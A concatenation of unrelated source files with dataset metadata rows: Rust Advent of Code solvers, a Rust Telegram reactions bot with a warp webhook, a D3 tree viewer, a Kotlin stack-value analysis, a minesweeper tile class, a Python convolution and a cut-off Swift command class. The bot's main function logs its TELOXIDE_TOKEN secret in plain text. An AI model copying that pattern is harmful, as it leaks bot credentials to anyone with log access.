    increases
}
// Verifies the counter against the AoC 2021 day-1 example (7 increases) and
// a hand-made sequence with exactly one increase.
#[test]
fn test_compute_increase() {
    let test_data: Vec<(Vec<u64>, u64)> = vec![
        (vec![199, 200, 208, 210, 200, 207, 240, 269, 260, 263], 7),
        (vec![1, 1, 1, 2, 1, 1, 1], 1)
    ];
    // the following iteration will consume the test data vector.
    for (test_inp, result) in test_data.iter() {
        assert_eq!(compute_consequtive_increase(test_inp), *result);
    }
} | 27.16129 | 93 | 0.557007 | 3.265625 |
83a7a128dbfc52d480556e124e5c3c03ec04e023 | 4,348 | rs | Rust | src/main.rs | laptou/reactions-telegram-bot | 7b044b1e8d9b313836dd99dcf4797f2346b76323 | [
"MIT"
] | 5 | 2021-03-21T17:04:52.000Z | 2021-12-30T21:18:45.000Z | src/main.rs | laptou/reactions-telegram-bot | 7b044b1e8d9b313836dd99dcf4797f2346b76323 | [
"MIT"
] | 2 | 2020-10-01T22:11:58.000Z | 2020-10-04T17:01:16.000Z | src/main.rs | laptou/reactions-telegram-bot | 7b044b1e8d9b313836dd99dcf4797f2346b76323 | [
"MIT"
] | 1 | 2021-04-15T13:57:01.000Z | 2021-04-15T13:57:01.000Z | use std::{convert::Infallible, env, net::SocketAddr};
use log::{info, warn};
use pretty_env_logger;
use teloxide::{dispatching::update_listeners::UpdateListener, utils::command::BotCommand};
use teloxide::{prelude::*, types::*};
use tokio;
mod handler;
mod reaction;
use handler::{handle_callback_query, handle_command};
use warp::{hyper::StatusCode, Filter};
/// Bot commands understood by the reactions bot; parsed from message text by
/// `BotCommand::parse` using lowercased names (e.g. "/help", "/r", "/heart").
#[derive(BotCommand, PartialEq, Eq, Debug, Clone, Copy)]
#[command(rename = "lowercase", description = "These commands are supported:")]
pub enum Command {
    #[command(description = "display this text.")]
    Help,
    #[command(description = "react to a message", rename = "r")]
    React,
    #[command(description = "react to a message with a ❤")]
    Heart,
    #[command(description = "react to a message with a 👍")]
    Up,
    #[command(description = "react to a message with a 👎")]
    Down,
    #[command(description = "show who reacted to a message", rename = "s")]
    Show,
}
#[tokio::main]
async fn main() {
info!("starting reactions bot");
teloxide::enable_logging!();
info!("token: {:?}", env::var("TELOXIDE_TOKEN").unwrap());
let bot = Bot::from_env();
let listener = webhook(bot.clone()).await;
Dispatcher::new(bot)
.messages_handler(move |rx: DispatcherHandlerRx<Message>| {
rx.for_each_concurrent(None, move |update| async move {
if let Some(text) = update.update.text() {
if let Ok(cmd) = Command::parse(text, "reaxnbot") {
if let Err(err) = handle_command(update, cmd).await {
warn!("message response failed: {:?}", err);
}
}
}
})
})
.callback_queries_handler(move |rx: DispatcherHandlerRx<CallbackQuery>| {
rx.for_each_concurrent(None, move |update| async move {
if let Err(err) = handle_callback_query(update).await {
warn!("callback query response failed: {:?}", err);
}
})
})
.dispatch_with_listener(listener, LoggingErrorHandler::new())
.await;
}
/// Registers a Telegram webhook at `https://reaxnbot.dev/reactions/bot<token>`
/// and spawns a warp HTTP server that forwards incoming updates into an
/// unbounded channel; the receiving half is returned as the update listener.
pub async fn webhook<'a>(bot: Bot) -> impl UpdateListener<Infallible> {
    // Heroku automatically defines the PORT value for the dyno.
    let teloxide_token = env::var("TELOXIDE_TOKEN").expect("TELOXIDE_TOKEN env variable missing");
    let port: u16 = env::var("PORT")
        .expect("PORT env variable missing")
        .parse()
        .expect("PORT value to be integer");
    // The bot token is embedded in the path so only Telegram (which knows
    // the token) can reach the webhook endpoint.
    let endpoint = format!("bot{}", teloxide_token);
    let prefix = "reactions";
    let url = format!("https://reaxnbot.dev/{}/{}", prefix, endpoint);
    bot.set_webhook(url)
        .send()
        .await
        .expect("Cannot setup a webhook");
    // Updates are pushed into `tx` by the HTTP handler below; `rx` is the
    // UpdateListener consumed by the dispatcher.
    let (tx, rx) = tokio::sync::mpsc::unbounded_channel();
    let server = warp::post()
        .and(warp::path(prefix))
        .and(warp::path(endpoint))
        .and(warp::body::json())
        .map(move |json: serde_json::Value| {
            let try_parse = match serde_json::from_str(&json.to_string()) {
                Ok(update) => Ok(update),
                Err(error) => {
                    log::error!(
                        "Cannot parse an update.\nError: {:?}\nValue: {}\n\
                         This is a bug in teloxide, please open an issue here: \
                         https://github.com/teloxide/teloxide/issues.",
                        error,
                        json
                    );
                    Err(error)
                }
            };
            if let Ok(update) = try_parse {
                tx.send(Ok(update))
                    .expect("Cannot send an incoming update from the webhook")
            }
            // Always acknowledge so Telegram does not retry malformed updates.
            StatusCode::OK
        });
    // Simple GET route, useful for checking that the server is reachable.
    let test_route = warp::get()
        .and(warp::path::tail())
        .map(|tail| format!("hello world {:?}", tail));
    let server = server.or(test_route).recover(handle_rejection);
    let serve = warp::serve(server);
    let address = format!("0.0.0.0:{}", port);
    tokio::spawn(serve.run(address.parse::<SocketAddr>().unwrap()));
    rx
}
/// warp rejection handler: logs the rejection and maps every failure onto a
/// plain 500 response (never propagates an error to the client).
async fn handle_rejection(error: warp::Rejection) -> Result<impl warp::Reply, Infallible> {
    log::error!("Cannot process the request due to: {:?}", error);
    Ok(StatusCode::INTERNAL_SERVER_ERROR)
}
| 33.705426 | 98 | 0.560948 | 3.09375 |
85b09f781bff657bfa1b539e3984457a9d1a791a | 7,043 | js | JavaScript | js/tree_vis.js | UnofficialJuliaMirrorSnapshots/D3Trees.jl-e3df1716-f71e-5df9-9e2d-98e193103c45 | c97f3175a258528c66d7b16f36627c903c9e3a03 | [
"MIT"
] | 22 | 2017-09-29T18:22:25.000Z | 2021-09-29T19:54:20.000Z | js/tree_vis.js | UnofficialJuliaMirrorSnapshots/D3Trees.jl-e3df1716-f71e-5df9-9e2d-98e193103c45 | c97f3175a258528c66d7b16f36627c903c9e3a03 | [
"MIT"
] | 20 | 2017-09-27T02:13:55.000Z | 2020-07-15T16:01:18.000Z | js/tree_vis.js | UnofficialJuliaMirrorSnapshots/D3Trees.jl-e3df1716-f71e-5df9-9e2d-98e193103c45 | c97f3175a258528c66d7b16f36627c903c9e3a03 | [
"MIT"
] | 6 | 2018-02-26T18:33:41.000Z | 2021-08-03T12:23:42.000Z | if (typeof $ === 'undefined') {
loadScript("https://code.jquery.com/jquery-3.1.1.min.js", run);
} else {
run();
}
// Second bootstrap stage (jQuery is available by now): make sure D3 is
// loaded, then render the tree.
function run() {
    if (typeof d3 !== 'undefined') {
        showTree();
        return;
    }
    loadScript("https://d3js.org/d3.v3.js", showTree);
}
/**
 * Dynamically loads a script by appending a <script> tag to <head> and
 * invokes `callback` once it has loaded. Both `onload` and the legacy
 * `onreadystatechange` are bound for cross-browser compatibility.
 */
function loadScript(url, callback) {
    console.log("starting script load...")
    var scriptTag = document.createElement('script');
    scriptTag.type = 'text/javascript';
    scriptTag.src = url;
    scriptTag.onreadystatechange = callback;
    scriptTag.onload = callback;
    // Appending the tag starts the download and execution.
    document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
/**
 * Renders the collapsible D3 (v3) tree into the container whose id is in the
 * global `div`. Relies on globals injected elsewhere: `div`, `svgHeight`,
 * `treeData` (per-node text/style/tooltip/children tables, 1-based child
 * ids), `rootID`, `initExpand`, `initDuration`, jQuery (`$`) and `d3`.
 * Clicking a node toggles (or lazily creates) its children.
 */
function showTree() {
    // var margin = {top: 20, right: 120, bottom: 20, left: 120},
    var margin = {top: 20, right: 120, bottom: 80, left: 120},
        width = $("#"+div).width() - margin.right - margin.left,
        height = svgHeight - margin.top - margin.bottom;
        // TODO make height a parameter of TreeVisualizer
    var i = 0,
        root;
    var tree = d3.layout.tree()
        .size([width, height]);
    var diagonal = d3.svg.diagonal();
        //.projection(function(d) { return [d.y, d.x]; });
        // uncomment above to make the tree go horizontally
    // see http://stackoverflow.com/questions/16265123/resize-svg-when-window-is-resized-in-d3-js
    if (d3.select("#"+div+"_svg").empty()) {
        $(".d3twarn").remove();
        d3.select("#"+div).append("svg")
            .attr("id", div+"_svg")
            .attr("width", width + margin.right + margin.left)
            .attr("height", height + margin.top + margin.bottom);
    }
    // Clear any previous rendering before drawing from scratch.
    d3.select("#"+div+"_svg").selectAll("*").remove();
    var svg = d3.select("#"+div+"_svg")
        .append("g")
        .attr("transform", "translate(" + margin.left + "," + margin.top + ")");
    // console.log("tree data:");
    // console.log(treeData[rootID]);
    root = createDisplayNode(rootID, initExpand);
    root.x0 = width / 2;
    root.y0 = 0;
    update(root, initDuration);
    console.log("tree should appear");
    // Wraps a treeData id in a display node; expands `expandLevel` levels.
    function createDisplayNode(id, expandLevel) {
        var dnode = {"dataID":id,
                     "children": null,
                     "_children":null};
        if (expandLevel > 0) {
            initializeChildren(dnode, expandLevel);
        }
        return dnode;
    }
    function initializeChildren(d, expandLevel) {
        // create children
        var children = treeData.children[d.dataID];
        d.children = [];
        if (children) {
            for (var i = 0; i < children.length; i++) {
                var cid = children[i]-1;
                d.children.push(createDisplayNode(cid, expandLevel-1));
            }
        }
    }
    /**
     * Recursively called to update each node in the tree.
     *
     * source is a d3 node that has position, etc.
     */
    function update(source, duration) {
        width = $("#"+div).width() - margin.right - margin.left,
        height = $("#"+div).height() - margin.top - margin.bottom;
        tree.size([width,height]);
        d3.select("#"+div).attr("width", width + margin.right + margin.left)
            .attr("height", height + margin.top + margin.bottom);
        d3.select("#"+div+"_svg").attr("width", width + margin.right + margin.left)
            .attr("height", height + margin.top + margin.bottom);
        // Compute the new tree layout.
        var nodes = tree.nodes(root).reverse(),
            links = tree.links(nodes);
        // Update the nodes…
        var node = svg.selectAll("g.node")
            .data(nodes, function(d) { return d.id || (d.id = ++i); });
        // Enter any new nodes at the parent's previous position.
        var nodeEnter = node.enter().append("g")
            .attr("class", "node")
            .attr("transform", function(d) { return "translate(" + source.x0 + "," + source.y0 + ")"; })
            .on("click", click)
        nodeEnter.append("circle")
            .attr("r", "10px")
            .attr("style", function(d) { return treeData.style[d.dataID]; } )
        var tbox = nodeEnter.append("text")
            .attr("y", 25)
            .attr("text-anchor", "middle")
            //.text( function(d) { return treeData.text[d.dataID]; } )
            .style("fill-opacity", 1e-6);
        // Multi-line labels: one tspan per '\n'-separated line.
        tbox.each( function(d) {
            var el = d3.select(this)
            var text = treeData.text[d.dataID];
            var lines = text.split('\n');
            for (var i = 0; i < lines.length; i++) {
                var tspan = el.append("tspan").text(lines[i]);
                if (i > 0) {
                    tspan.attr("x", 0).attr("dy", "1.2em");
                }
            }
        });
        //tooltip
        nodeEnter.append("title").text( function(d) { return treeData.tooltip[d.dataID];} );
        // Transition nodes to their new position.
        var nodeUpdate = node.transition()
            .duration(duration)
            .attr("transform", function(d) { return "translate(" + d.x + "," + d.y + ")"; });
        nodeUpdate.select("text")
            .style("fill-opacity", 1);
        // Transition exiting nodes to the parent's new position.
        var nodeExit = node.exit().transition()
            .duration(duration)
            .attr("transform", function(d) { return "translate(" + source.x + "," + source.y + ")"; })
            .remove();
        nodeExit.select("text")
            .style("fill-opacity", 1e-6);
        // Update the links…
        var link = svg.selectAll("path.link")
            .data(links, function(d) { return d.target.id; });
        // Enter any new links at the parent's previous position.
        // XXX link width should be based on transition data, not node data
        link.enter().insert("path", "g")
            .attr("class", "link")
            .attr("style", function(d) {
                var ls = treeData.link_style[d.target.dataID];
                return ls;
            } )
            .attr("d", function(d) {
                var o = {x: source.x0, y: source.y0};
                return diagonal({source: o, target: o});
            });
        // Transition links to their new position.
        link.transition()
            .duration(duration)
            .attr("d", diagonal);
        // Transition exiting nodes to the parent's new position.
        link.exit().transition()
            .duration(duration)
            .attr("d", function(d) {
                var o = {x: source.x, y: source.y};
                return diagonal({source: o, target: o});
            })
            .remove();
        // Stash the old positions for transition.
        nodes.forEach(function(d) {
            d.x0 = d.x;
            d.y0 = d.y;
        });
    }
    // Toggle children on click.
    function click(d) {
        if (d.children) {
            d._children = d.children;
            d.children = null;
        } else if (d._children) {
            d.children = d._children;
            d._children = null;
        } else {
            initializeChildren(d, 1);
        }
        update(d, 750);
    }
} | 31.441964 | 102 | 0.543802 | 3.046875 |
5adc45dcf20cc0bceef7b69f755461f0ee107f2f | 2,215 | rs | Rust | 2017/src/day01.rs | shrugalic/advent_of_code | 8d18a3dbdcf847a667ab553f5441676003b9362a | [
"MIT"
] | 1 | 2021-12-17T18:26:17.000Z | 2021-12-17T18:26:17.000Z | 2017/src/day01.rs | shrugalic/advent_of_code | 8d18a3dbdcf847a667ab553f5441676003b9362a | [
"MIT"
] | null | null | null | 2017/src/day01.rs | shrugalic/advent_of_code | 8d18a3dbdcf847a667ab553f5441676003b9362a | [
"MIT"
] | null | null | null | use line_reader::read_file_to_lines;
/// Solves 2017 day 1 part 1 for the puzzle input file on disk.
pub(crate) fn day1_part1() -> u32 {
    let line = read_file_to_lines("input/day01.txt").remove(0);
    solve_part1_captcha(line)
}
/// Solves 2017 day 1 part 2 for the puzzle input file on disk.
pub(crate) fn day1_part2() -> u32 {
    let line = read_file_to_lines("input/day01.txt").remove(0);
    solve_part2_captcha(line)
}
/// Part 1: compare each digit with its immediate successor (offset 1).
fn solve_part1_captcha<T: AsRef<str>>(line: T) -> u32 {
    solve_captcha(parse_input(line), 1)
}
/// Part 2: compare each digit with the one halfway around the circle.
fn solve_part2_captcha<T: AsRef<str>>(line: T) -> u32 {
    let numbers = parse_input(line);
    let offset = numbers.len() / 2;
    solve_captcha(numbers, offset)
}
/// Sums every element that equals the element `offset` positions further on,
/// treating the vector as circular (comparison wraps to the front).
///
/// Implemented by appending the first `offset` elements to the end and then
/// comparing index `i` with `i + offset`. Panics if `offset` exceeds the
/// input length (same as the original `extend_from_within` behaviour).
fn solve_captcha(mut numbers: Vec<u32>, offset: usize) -> u32 {
    numbers.extend_from_within(0..offset);
    let mut total = 0;
    for index in 0..numbers.len() - offset {
        if numbers[index] == numbers[index + offset] {
            total += numbers[index];
        }
    }
    total
}
/// Converts every decimal digit character in `line` to its numeric value,
/// silently skipping non-digit characters (e.g. a trailing newline).
fn parse_input<T: AsRef<str>>(line: T) -> Vec<u32> {
    let mut digits = Vec::new();
    for ch in line.as_ref().chars() {
        if let Some(digit) = ch.to_digit(10) {
            digits.push(digit);
        }
    }
    digits
}
#[cfg(test)]
mod tests {
    use super::*;
    // Worked examples from the 2017 day-1 puzzle description, plus the
    // author's accepted answers for the real input (1144 / 1194).
    #[test]
    fn part1_example1() {
        assert_eq!(3, solve_part1_captcha("1122"));
    }
    #[test]
    fn part1_example2() {
        assert_eq!(4, solve_part1_captcha("1111"));
    }
    #[test]
    fn part1_example3() {
        assert_eq!(0, solve_part1_captcha("1234"));
    }
    #[test]
    fn part1_example4() {
        assert_eq!(9, solve_part1_captcha("91212129"));
    }
    #[test]
    fn test_day1_part1() {
        assert_eq!(1144, day1_part1());
    }
    #[test]
    fn part2_example1() {
        assert_eq!(6, solve_part2_captcha("1212"));
    }
    #[test]
    fn part2_example2() {
        assert_eq!(0, solve_part2_captcha("1221"));
    }
    #[test]
    fn part2_example3() {
        assert_eq!(4, solve_part2_captcha("123425"));
    }
    #[test]
    fn part2_example4() {
        assert_eq!(12, solve_part2_captcha("123123"));
    }
    #[test]
    fn part2_example5() {
        assert_eq!(4, solve_part2_captcha("12131415"));
    }
    #[test]
    fn test_day1_part2() {
        assert_eq!(1194, day1_part2());
    }
}
| 20.896226 | 63 | 0.552596 | 3.21875 |
fb628cfd5872f8ee00cb34decf048e7ec09267be | 3,752 | kt | Kotlin | psolib/src/commonMain/kotlin/world/phantasmal/psolib/asm/dataFlowAnalysis/GetStackValue.kt | DaanVandenBosch/phantasmal-world | 89ea739c65fda32cda1caaf159cad022469e2663 | [
"MIT"
] | 16 | 2019-06-14T03:20:51.000Z | 2022-02-04T08:01:56.000Z | psolib/src/commonMain/kotlin/world/phantasmal/psolib/asm/dataFlowAnalysis/GetStackValue.kt | DaanVandenBosch/phantasmal-world | 89ea739c65fda32cda1caaf159cad022469e2663 | [
"MIT"
] | 12 | 2019-09-15T20:37:05.000Z | 2022-02-06T03:24:22.000Z | psolib/src/commonMain/kotlin/world/phantasmal/psolib/asm/dataFlowAnalysis/GetStackValue.kt | DaanVandenBosch/phantasmal-world | 89ea739c65fda32cda1caaf159cad022469e2663 | [
"MIT"
] | 5 | 2019-07-20T05:16:20.000Z | 2021-11-15T09:19:54.000Z | package world.phantasmal.psolib.asm.dataFlowAnalysis
import mu.KotlinLogging
import world.phantasmal.psolib.asm.*
private val logger = KotlinLogging.logger {}
/**
* Computes the possible values of a stack element at the nth position from the top, right before a
* specific instruction. If the stack element's value can be traced back to a single push
* instruction, that instruction is also returned.
*/
fun getStackValue(
    cfg: ControlFlowGraph,
    instruction: Instruction,
    position: Int,
): Pair<ValueSet, Instruction?> {
    // Resolve the basic block containing the instruction and walk backwards
    // from just before it; `position` 0 denotes the top of the stack.
    val block = cfg.getBlockForInstruction(instruction)
    return StackValueFinder().find(
        mutableSetOf(),
        cfg,
        block,
        block.indexOfInstruction(instruction),
        position,
    )
}
/**
 * Walks backwards through the control-flow graph looking for the instruction
 * that pushed the stack element at a given depth, accumulating its possible
 * values. The search is capped at 100 visits to keep the analysis cheap.
 */
private class StackValueFinder {
    // Total block visits across the whole (recursive) search.
    private var iterations = 0
    fun find(
        path: MutableSet<BasicBlock>,
        cfg: ControlFlowGraph,
        block: BasicBlock,
        end: Int,
        position: Int,
    ): Pair<ValueSet, Instruction?> {
        // Give up with "could be anything" once the search grows too large.
        if (++iterations > 100) {
            logger.warn { "Too many iterations." }
            return Pair(ValueSet.all(), null)
        }
        var pos = position
        // Scan this block's instructions in reverse, starting just before `end`.
        for (i in end - 1 downTo block.start) {
            val instruction = block.segment.instructions[i]
            // Popping instructions move our target deeper into the stack.
            if (instruction.opcode.stack == StackInteraction.Pop) {
                pos += instruction.opcode.params.size
                continue
            }
            val args = instruction.args
            when (instruction.opcode.code) {
                // Push from register: delegate to the register value analysis.
                OP_ARG_PUSHR.code -> {
                    if (pos == 0) {
                        val arg = args[0]
                        return if (arg is IntArg) {
                            Pair(getRegisterValue(cfg, instruction, arg.value), instruction)
                        } else {
                            Pair(ValueSet.all(), instruction)
                        }
                    } else {
                        pos--
                    }
                }
                // Push-literal opcodes: the pushed value is the instruction's
                // literal integer argument.
                OP_ARG_PUSHL.code,
                OP_ARG_PUSHB.code,
                OP_ARG_PUSHW.code,
                -> {
                    if (pos == 0) {
                        val arg = args[0]
                        return if (arg is IntArg) {
                            Pair(ValueSet.of(arg.value), instruction)
                        } else {
                            Pair(ValueSet.all(), instruction)
                        }
                    } else {
                        pos--
                    }
                }
                // Pushes whose value cannot be tracked statically.
                OP_ARG_PUSHA.code,
                OP_ARG_PUSHO.code,
                OP_ARG_PUSHS.code,
                -> {
                    if (pos == 0) {
                        return Pair(ValueSet.all(), instruction)
                    } else {
                        pos--
                    }
                }
            }
        }
        // Not pushed in this block: merge the results from all predecessors.
        val values = ValueSet.empty()
        var instruction: Instruction? = null
        var multipleInstructions = false
        path.add(block)
        for (from in block.from) {
            // Bail out from loops.
            if (from in path) {
                return Pair(ValueSet.all(), null)
            }
            val (fromValues, fromInstruction) = find(LinkedHashSet(path), cfg, from, from.end, pos)
            values.union(fromValues)
            // A single originating instruction is only reported when every
            // predecessor agrees on the same one.
            if (!multipleInstructions) {
                if (instruction == null) {
                    instruction = fromInstruction
                } else if (instruction != fromInstruction) {
                    instruction = null
                    multipleInstructions = true
                }
            }
        }
        return Pair(values, instruction)
    }
}
| 29.3125 | 99 | 0.472548 | 3.21875 |
e73edfde7f67f674b761d7588194ef86d54d8b46 | 2,258 | js | JavaScript | src/game/models/tile.js | aldhsu/minesweeper | adaa9bc74b53dbe4697e2bf228faabf973eb093d | [
"CC0-1.0"
] | null | null | null | src/game/models/tile.js | aldhsu/minesweeper | adaa9bc74b53dbe4697e2bf228faabf973eb093d | [
"CC0-1.0"
] | null | null | null | src/game/models/tile.js | aldhsu/minesweeper | adaa9bc74b53dbe4697e2bf228faabf973eb093d | [
"CC0-1.0"
] | null | null | null | import _ from 'underscore';
export default class Tile {
  /**
   * A single minesweeper board cell.
   *
   * @param {number} y - row index of this tile on the board.
   * @param {number} x - column index of this tile within its row.
   * @param {Array<Array<Tile>>} board - 2D array (rows of tiles) the tile belongs to.
   * @param {Object} channel - event emitter; `emit('reveal')` is fired on state changes.
   */
  constructor(y, x, board, channel) {
    this.x = x;
    this.y = y;
    this.board = board;
    this.revealed = false;
    this.isBomb = false;
    this.channel = channel;
    this.isFlagged = false;
  }

  get isRevealed() {
    return this.revealed;
  }

  get hasBomb() {
    return this.isBomb;
  }

  /** Turns this tile into a bomb; returns `this` for chaining. */
  becomeBomb() {
    this.isBomb = true;
    return this;
  }

  /** Number of neighbouring tiles that contain a bomb. */
  get bombCount() {
    return this.neighbours.reduce(
      (count, tile) => count + (tile.hasBomb ? 1 : 0),
      0
    );
  }

  /**
   * Reveals this tile. When no neighbouring bomb exists, flood-reveals the
   * surrounding unrevealed, bomb-free tiles. Emits 'reveal' on the channel.
   * @returns {boolean} always true.
   */
  reveal() {
    this.revealed = true;
    if (this.bombCount === 0) {
      this.neighbours
        .filter((tile) => !tile.revealed && !tile.isBomb)
        .forEach((tile) => tile.reveal());
    }
    this.channel.emit('reveal');
    return true;
  }

  /** Marks this tile as flagged and notifies listeners. */
  flag() {
    this.isFlagged = true;
    this.channel.emit('reveal');
  }

  // Convenience accessors for the eight surrounding positions; each returns
  // the neighbouring Tile, or undefined when that position is off the board.
  get topLeft() {
    return this.safePositionCheck([this.y - 1, this.x - 1])
  }
  get topMiddle() {
    return this.safePositionCheck([this.y - 1, this.x])
  }
  get topRight() {
    return this.safePositionCheck([this.y - 1, this.x + 1])
  }
  get left() {
    return this.safePositionCheck([this.y, this.x - 1])
  }
  get right() {
    return this.safePositionCheck([this.y, this.x + 1])
  }
  get bottomLeft() {
    return this.safePositionCheck([this.y + 1, this.x - 1])
  }
  get bottomMiddle() {
    return this.safePositionCheck([this.y + 1, this.x])
  }
  get bottomRight() {
    return this.safePositionCheck([this.y + 1, this.x + 1])
  }

  /**
   * Returns the tile at [yOffset, xOffset], or undefined when the position
   * is outside the board. Bug fix: the column bound is now checked against
   * the row's length instead of the row count, so rectangular (non-square)
   * boards are handled correctly.
   * @param {[number, number]} offsets - [row, column] position to look up.
   */
  safePositionCheck(offsets) {
    const [yOffset, xOffset] = offsets;
    if (yOffset < 0 || yOffset >= this.board.length) {
      return undefined;
    }
    const row = this.board[yOffset];
    if (xOffset < 0 || xOffset >= row.length) {
      return undefined;
    }
    return row[xOffset];
  }

  /** All existing adjacent tiles (3 to 8, depending on board position). */
  get neighbours() {
    const found = [];
    for (let dy = -1; dy <= 1; dy++) {
      for (let dx = -1; dx <= 1; dx++) {
        if (dy === 0 && dx === 0) {
          continue;
        }
        found.push(this.safePositionCheck([this.y + dy, this.x + dx]));
      }
    }
    // Drop undefined entries for off-board positions (stdlib replacement for
    // the previous third-party `_.compact` call).
    return found.filter((tile) => tile !== undefined);
  }
}
| 19.807018 | 124 | 0.550487 | 3.171875 |
ad44640a5702e5628a875fa2bd0cf737563647a8 | 2,336 | lua | Lua | src/mod/tools/api/MapViewer.lua | Ruin0x11/OpenNefia | 548f1a1442eca704bb1c16b1a1591d982a34919f | [
"MIT"
] | 109 | 2020-04-07T16:56:38.000Z | 2022-02-17T04:05:40.000Z | src/mod/tools/api/MapViewer.lua | Ruin0x11/OpenNefia | 548f1a1442eca704bb1c16b1a1591d982a34919f | [
"MIT"
] | 243 | 2020-04-07T08:25:15.000Z | 2021-10-30T07:22:10.000Z | src/mod/tools/api/MapViewer.lua | Ruin0x11/OpenNefia | 548f1a1442eca704bb1c16b1a1591d982a34919f | [
"MIT"
] | 15 | 2020-04-25T12:28:55.000Z | 2022-02-23T03:20:43.000Z | local Draw = require("api.Draw")
local Gui = require("api.Gui")
local InstancedMap = require("api.InstancedMap")
local MapRenderer = require("api.gui.MapRenderer")
local IUiLayer = require("api.gui.IUiLayer")
local IInput = require("api.gui.IInput")
local InputHandler = require("api.gui.InputHandler")
--- Debug tool that renders an entire map in a scrollable UI layer.
--- Arrow keys pan the view; enter/escape/cancel close it.
local MapViewer = class.class("MapViewer", IUiLayer)
MapViewer:delegate("input", IInput)
--- Memorizes and redraws every tile of `map`, then centers it on screen.
function MapViewer:init(map)
   class.assert_is_an(InstancedMap, map)
   self.map = map
   -- Mark every tile as seen so the renderer will draw the full map.
   map:iter_tiles():each(function(x, y) map:memorize_tile(x, y) end)
   map:redraw_all_tiles()
   self.renderer = MapRenderer:new(map)
   local tw, th = Draw.get_coords():get_size()
   local mw = self.map:width() * tw
   local mh = self.map:height() * th
   -- Center the map in the window; pan speed is half a tile per keypress.
   self.offset_x = math.floor((Draw.get_width() - mw) / 2)
   self.offset_y = math.floor((Draw.get_height() - mh) / 2)
   self.delta = math.floor(tw / 2)
   self.input = InputHandler:new()
   self.input:bind_keys(self:make_keymap())
end
-- Draw this layer above (almost) everything else.
function MapViewer:default_z_order()
   return 100000000
end
--- Key bindings: arrows pan; any confirm/cancel key flags the viewer closed.
function MapViewer:make_keymap()
   return {
      north = function() self:pan(0, -self.delta) end,
      south = function() self:pan(0, self.delta) end,
      east = function() self:pan(self.delta, 0) end,
      west = function() self:pan(-self.delta, 0) end,
      cancel = function() self.canceled = true end,
      escape = function() self.canceled = true end,
      enter = function() self.canceled = true end,
   }
end
function MapViewer:on_query()
   Gui.play_sound("base.pop2")
end
--- Moves the viewport by (dx, dy) pixels.
function MapViewer:pan(dx, dy)
   self.offset_x = math.floor(self.offset_x + dx)
   self.offset_y = math.floor(self.offset_y + dy)
end
function MapViewer:relayout(x, y, width, height)
   self.x = x
   self.y = y
   self.width = width
   self.height = height
   self.renderer:relayout(self.x, self.y, self.width, self.height)
end
--- Draws the map renderer at the current pan offset.
function MapViewer:draw()
   local x = self.x + self.offset_x
   local y = self.y + self.offset_y
   self.renderer.x = x
   self.renderer.y = y
   Draw.set_color(255, 255, 255)
   self.renderer:draw()
end
--- Returns nil, "canceled" once a closing key was pressed, ending the query.
function MapViewer:update(dt)
   self.renderer:update(dt)
   local canceled = self.canceled
   self.canceled = nil
   if canceled then
      return nil, "canceled"
   end
end
--- Convenience entry point: builds a viewer for `map` and queries it.
function MapViewer.start(map)
   MapViewer:new(map):query()
end
return MapViewer
| 24.333333 | 68 | 0.686644 | 3.25 |
0ce87ae6e8e21068ebe0de253baf4eb583ece22f | 701 | py | Python | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | import numpy as np
def convolucion(Ioriginal, kernel):
    """Apply a 2D "valid" sliding-window filter of ``kernel`` over an image.

    Note: the kernel is applied without flipping (``kernel[m][n] *
    image[i+m][j+n]``), so mathematically this is cross-correlation -- the
    same operation the original quadruple loop computed. The two innermost
    Python loops are replaced with a vectorized NumPy window product for the
    same result with far fewer interpreter steps.

    Args:
        Ioriginal: 2D image (nested lists or ndarray) of shape (H, W).
        kernel: 2D kernel (nested lists or ndarray) of shape (kH, kW),
            with kH <= H and kW <= W.

    Returns:
        numpy.ndarray of shape (H - kH + 1, W - kW + 1) holding the filter
        response at each valid position.
    """
    image = np.asarray(Ioriginal, dtype=float)
    kern = np.asarray(kernel, dtype=float)
    out_rows = image.shape[0] - kern.shape[0] + 1
    out_cols = image.shape[1] - kern.shape[1] + 1
    res = np.zeros((out_rows, out_cols))
    for i in range(out_rows):
        for j in range(out_cols):
            window = image[i:i + kern.shape[0], j:j + kern.shape[1]]
            res[i, j] = np.sum(kern * window)
    return res
75c6fcc4bc86bebf74b9fc4302553cb213042dfa | 3,108 | swift | Swift | src/JetLib/JetLib/Core/Command/ActionCommand.swift | TrueShirshov/ios_swift_utils | a72c43d4fb9db6f34616b88ab7acc786af0bc6d6 | [
"MIT"
] | 7 | 2018-10-01T12:17:10.000Z | 2020-11-07T10:34:17.000Z | src/JetLib/JetLib/Core/Command/ActionCommand.swift | TrueShirshov/ios_swift_utils | a72c43d4fb9db6f34616b88ab7acc786af0bc6d6 | [
"MIT"
] | null | null | null | src/JetLib/JetLib/Core/Command/ActionCommand.swift | TrueShirshov/ios_swift_utils | a72c43d4fb9db6f34616b88ab7acc786af0bc6d6 | [
"MIT"
] | 1 | 2019-08-28T19:18:29.000Z | 2019-08-28T19:18:29.000Z | //
// Created on 27/07/2018
// Copyright © Vladimir Benkevich 2018
//
import Foundation
/// Command that executes a stored closure when run, with an optional
/// `canExecute` predicate. The generic initializers type-check the command
/// parameter (`$0 is T`) before allowing execution.
@available(*, deprecated, message: "Use CommandFactory instead")
open class ActionCommand: SerialCommand {
    /// Type-erased action invoked on execution.
    private let execute: (Any?) -> Void
    /// Optional predicate deciding whether execution is currently allowed.
    private let canExecute: ((Any?) -> Bool)?
    public init(execute: @escaping () -> Void) {
        self.execute = { _ in execute() }
        self.canExecute = nil
    }
    public init(execute: @escaping () -> Void, canExecute: @escaping () -> Bool) {
        self.execute = { _ in execute() }
        self.canExecute = { _ in canExecute() }
    }
    /// Parameterized variant: execution is only allowed when the parameter
    /// actually is a `T` (the force cast in `execute` is then safe).
    public init<T>(execute: @escaping (T) -> Void) {
        self.execute = {
            execute($0 as! T)
        }
        self.canExecute = {
            return $0 is T
        }
    }
    public init<T>(execute: @escaping (T) -> Void, canExecute: @escaping (T) -> Bool) {
        self.execute = { execute($0 as! T) }
        self.canExecute = { $0 is T && canExecute($0 as! T) }
    }
    /// Queue the action is dispatched on; defaults to the main queue.
    open var executeQueue: DispatchQueue = DispatchQueue.main
